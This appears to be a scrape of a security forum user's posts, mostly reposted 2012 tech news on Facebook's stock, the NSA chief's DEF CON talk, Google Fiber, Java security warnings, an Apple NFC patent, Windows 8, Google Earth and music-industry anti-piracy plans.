The tension between short and long-term thinking leads to very different ideas about how Facebook ought to manage its business. I'm sure Mark Zuckerberg won't lose any sleep about Wall Street's ongoing hissy fit about Facebook -- nor should he. More about that in a moment. Following the disappointment over the company's second-quarter earnings, Facebook shares fell another 11.7 percent Friday, despite the market-lifting euphoria over the European Central Bank chief's plans to bolster the Euro. An extreme sell-off, for sure, but not surprising for a stock that's tumbled almost 38 percent since its star-crossed debut on the NASDAQ in May. Given how this outsize company has infiltrated popular culture, Facebook's fall from grace has also inspired panic. Some see it as a metaphor for the popping of the social-media investment bubble. Then there's the smug second guessing: Weren't we all dummies to ever believe in a company that does so many things so wrong? The chorus of "Zuck must go" has begun. Zuckerberg never wanted to take the company public in the first place. Circumstances -- mainly in the form of an antiquated SEC rule -- forced his hand. But that was part of the devil's bargain. So it was that during the company's earnings conference call with analysts, Zuckerberg and his key lieutenants went through the motions of pretending that what Wall Street has to say about his company matters. He knows that's a fiction -- and so do they. Wall Street's obsessed with the next quarter and Facebook's thinking about next year. Not the sort of answers you'll get from a quick-buck shyster doing a shuck-and-jive routine to jack the stock price. The suits surely wanted to hear more about what Facebook will do to reverse big slowdowns in payments growth, user growth (in the West), and U.S. ad impressions. It wasn't going to happen. Zuckerberg's refusal to play that game is hurting Facebook's credibility with a constituency that he's now stuck with. 
It's an uneasy marriage, but the two sides have no choice other than to get used to each other. It's not as if shareholders can force Zuckerberg out. He structured the company specifically so he can build at his pace and not take his cues from investors, whether venture capitalists or Wall Street. Zuckerberg's strategic mindset has helped Facebook attract some 955 million monthly users. As has been well chronicled elsewhere, Zuckerberg has had myriad opportunities to sell out. He didn't take the earlier offers because he wanted to build a business that stands the test of time. Walter Isaacson's biography last year revealed how Steve Jobs admired Zuckerberg for not selling out. With Jobs no longer around, Zuckerberg can find a kindred spirit in Jeff Bezos, another tech executive who continues to defy Wall Street and do what he knows is in the long-term interest of his company. Quarter after quarter, year after year, Wall Street complains about how much Amazon spends on infrastructure. The criticism falls on deaf ears. Bezos is thinking years ahead, planning on extending Amazon's reach far beyond its current borders. If he gets slammed by the bean counters, well, that goes with the job description. Ditto for Zuckerberg. He's a big boy and presumably has grown a thick enough skin to ignore the investing class' periodic tantrums. He's brought Facebook this far. No reason why he can't lead it to bigger things in the future -- if he stays true to himself. Sursa
-
NSA Chief General Keith Alexander Addresses DEF CON Attendees LAS VEGAS - DEF CON XX – General Keith Alexander, the man in charge of both the NSA and U.S. Cyber Command, delivered a talk Friday afternoon in Las Vegas that sounded like part recruitment pitch and part stump speech for cybersecurity legislation. General Alexander started his keynote by offering kudos and talking up some of DEF CON's achievements. Dressed in casual attire, the nation's top intelligence official made history by being the highest-ranking government official to speak at DEF CON in its 20-year history. Referencing DEF CON as a whole, General Alexander called it the "world's best cyber security community." Unfortunately, the General seemed to talk down to many of the highly intelligent people attending his talk, recapping the history of security contributions from the hacker community – such as SNORT, IDS and IPS innovations, NMAP, etc – and the government, including Enigma and DES. He talked about the threats that organizations face online, offering what came off as a watered-down version of his previous public talks, complete with mention of the significant vulnerabilities and a listing of recent security incidents. Again, most of those who came to see him speak were well aware of the security challenges that organizations of all shapes and sizes face, so it was unfortunate that the first part of his talk was spent in a type of recap and review. "If I had a drink every time Gen. Alexander said 'cyber' I would already be drunk," an attendee at his talk commented on Twitter. To be fair, clearly General Alexander wasn't attempting to talk down to the crowd, nor was he intending to overhype his situation. The aim of the talk was to build a bridge between the hacking community and the government.
At one point he commented on several problems that the private and government sectors face, mentioning that if those in attendance at his talk were to focus on them for a week or so, those problems would likely be solved rather quickly. As previously mentioned on SecurityWeek, General Alexander's talk aimed to highlight the common goals that the hacker community shares with the government, including a drive to protect personal privacy and civil liberties. As such, the recruitment drive from the NSA came as no surprise. The end of the talk included a brief Q&A, but there was nothing overly secretive revealed. General Alexander's session wasn't the best it could have been, but if anything he did appear to genuinely want help addressing the problems he has outlined many times before. At the same time, he may have been talking to the wrong crowd. Most of those who are here at Def Con, and who are likely to help the General address those problems, are already doing what they can. Sursa
-
File upload vulnerabilities
DarkyAngel replied to Sim Master's topic in Tutoriale in romana
In short, you don't know how to read..:
-
"Your username must be under 8 characters long." Would a higher limit work?
-
Google launches Fiber TV, Samsung doubles up on Apple, and eBay goes after the 18-and-under crowd. Google goes fiber and Samsung doubles up on Apple: Video here Google has launched a Fiber TV and Internet service in Kansas City, Mo., as part of a beta test. The service provides customers with 1Gbps broadband speed and fiber television that uses an interactive interface. Now while it may not get you all of your favorite channels, Google is trying to show the cable providers of the world that this is how content should be delivered. Google hopes that the technology will spark the interest of other companies who are using older communication mediums. Those who sign up for the service will get 1TB of Google Drive storage, a DVR that can record up to eight shows at once, and hold 500 hours of programming. It doesn't end there with the Google news. The latest iOS version of Google Earth is upon us and it features an insane level of 3D maps detail for some major cities, though only newer iOS devices will be able to handle the 3D features. Samsung has doubled up on Apple, selling more than twice the amount of devices during Q2. It's no secret that this can be attributed to Samsung's popular Galaxy S 3 and the calm before the iPhone 5 storm, but it's worth noting that HTC's, Motorola's, and RIM's sales combined just barely exceeded iPhone sales during the same period of time. Web-to-TV streamer Roku has successfully ended a round of funding, raising $45 million through News Corp. and British Sky Broadcasting. The money will be used to help promote the Roku brand and enter new markets. Of course it's logical to assume that the sources of the funding will influence content available on Roku products, but there's no word yet on how that will play out. eBay's president of global markets, Devin Wenig, said that the company plans on allowing children under 18 to create accounts and begin participating in certain auctions. 
Wenig reassured us that eBay wouldn't just be giving teenagers unfettered access to the site -- thankfully -- and will require all such accounts to be approved and monitored by a parent. This model isn't totally unheard of, though: Facebook has been considering giving kids 13 and older access to its social network. Sursa
-
Microsoft has a very poor opinion of Java: Update Java or disable it! Microsoft security specialists maintain that, without regular updates, the application is an ever greater danger because of vulnerabilities exploited by malware. The reasons Microsoft has taken a stance against Java come down to two vulnerabilities that compromise the Java sandbox and allow malware to be installed. Temporarily disabling the Java plug-in from the Control Panel is another solution Microsoft recommends for protection against the growing number of malware applications that exploit Java vulnerabilities. The malware danger in Java can also be eliminated completely by fully uninstalling the plug-in criticized by Microsoft. Source
-
Apple wants to control everything in your home via NFC
DarkyAngel posted a topic in Stiri securitate (Security news)
A newly revealed patent application can be summed up simply: Apple wants to enslave every electronic device under your roof.

An Apple patent application published yesterday reveals that the company has seriously looked into the notion of using near-field communication to allow its devices to take over your home, from the garage door to your gaming console. The patent was originally filed in April of 2010 and is quite lengthy, with dozens of illustrations showing Apple products (largely the iPhone) using mostly NFC to act as a remote control to turn various household devices like televisions, projectors, standalone cameras, and DVRs into their slaves.

No, I'm not saying Apple has applied to patent digital slavery -- unless you already consider yourself a slave to Apple products in your house, in which case this patent could certainly tighten your iShackles while also making them a lot more comfy and amazing.

The banal title of the patent is "System and Method For Simplified Control of Electronic Devices," and while that string of words is yawn-inducing, it's also pretty accurate. The idea here is for Apple to control all your home's electronic devices, right down to your sprinkler system, by connecting them to a Mac or iOS device (or both) using NFC, RFID, or whatever other means of communication is available. Many of the interactions described in the patent involve an iOS device and an Apple TV (the currently available set-top variety), including the interesting notion of being able to control games on an existing console, like an Xbox, using the iPhone touch screen.

This patent application was filed a full year before the similar Android @Home concept was introduced at Google I/O in 2011 (an idea that has rarely been heard from since). Not everything Apple patents makes it to market, of course, so it's possible this vision of a household indentured to Apple could also fade away. But with a new iPhone and the spectre of an Apple HDTV on the horizon, I imagine we'll be hearing more about some of these ideas soon, and many consumers will happily embrace their new forms of bondage. Source
-
Windows 8 could face a boycott even before its launch. Valve's CEO maintains that the new operating system on the ARM architecture will seriously hurt game developers. The CEO of Valve, the company that developed the Steam electronic game delivery platform, maintains that PC game sales will be seriously hurt by the introduction of the Windows Store as the only option for installing programs on ARM gadgets and PCs (Windows RT). "Windows 8 is a catastrophe for all industries connected to the PC," says Valve boss Gabe Newell. The fact that the Windows Store will be the sole software distributor on Windows RT tablets and PCs is even more serious when Microsoft's commission is taken into account: 30% of all sales. The Valve Steam platform, which currently has 40 million active users on Windows, Mac and Linux, could be completely excluded from the market of Windows RT users, Newell maintains. Source
-
Google is determined to keep its supremacy on the iPhone and iPad, even if Apple includes its own maps application in the new iOS 6. Google Earth 7.0 for iOS was released a month after it became available on the Android platform. The improved 3D maps currently cover only 14 major locations in the US, but Google is working hard on expanding them. Users still have to wait at least a month until they can compare Google Earth 7.0 with Apple's new maps. The full functionality of the 3D maps in the iOS Google Earth application is not available on all Apple gadgets. The update to the iOS application is available for any gadget running iOS 4.2 or a newer operating system. The 3D maps in Google Earth 7, however, require a lot of computing power, so they will only be available on the newest Apple gadgets: iPhone 4S, iPad 2 and the new iPad. Source
-
A few documents detailing the global strategy for fighting piracy have appeared online. The music industry has a strategy with 5 weapons for fighting the distribution of music that infringes copyright. The anti-piracy plan was developed by the International Federation of the Phonographic Industry (IFPI) and published by TorrentFreak, and includes 5 separate strategies for discouraging the distribution of pirated content, BGR writes. The music industry's 5 anti-piracy strategies include: shutting down sites with pirated music; attacks that prevent the proper functioning of pirated-content distribution; investigating suspicious sites; lobbying against online piracy; legal action against the major sites with pirated content. The document detailing the fight against piracy also mentions the existence of agreements with Google, Apple and Microsoft to remove mobile applications that offer pirated content. Source